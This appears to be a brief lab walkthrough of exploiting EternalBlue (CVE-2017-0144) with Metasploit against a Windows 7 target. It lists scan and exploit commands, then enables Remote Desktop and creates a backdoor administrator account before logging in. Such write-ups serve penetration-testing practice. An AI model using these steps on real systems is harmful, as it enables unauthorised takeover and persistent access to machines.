CVE-2017-0144
Introduction - Eternal Blue
利用 Metasploit 中针对 ms17-101 漏洞的攻击载荷进行攻击获取主机控制权限。“永恒之蓝”的原理主要是扫描所有开放 445 文件共享端口的 Windows 机器。445 端口可以在局域网中轻松访问各种共享文件夹或共享打印机。
- Tool: Kali Rolling x64
- Target Machine: Windows 7 Ultimate x64
步骤
Bash
nmap -r 10.20.20.0/28 # search target (optional) msfconsole
msfconsole
search ms17_010 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 10.20.20.7 use exploit/windows/smb/ms17_010_eternalblue set rhosts 10.20.20.7 run # exploit
meterpreter
#if it not enter CMD automatically, input the below command in meterpreter shell
CMD
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f net user USERNAME PASSWORD /add net localgroup administrators USERNAME /add
Bash
rdesktop 10.20.20.7:3389 # then input the USERNAME and PASSWORD you had created # now you can control the target machine
Tips
The Below OS version may cause Blue Screen and cannot use successfully:
- Windows 7 Home x86
- Windows 7 Professional x86
- Windows 7 Enterprise x86
It’s likly the 32-bit OS of Windows 7 as the same case, but we can attack successfully on XP SP3(32-bit).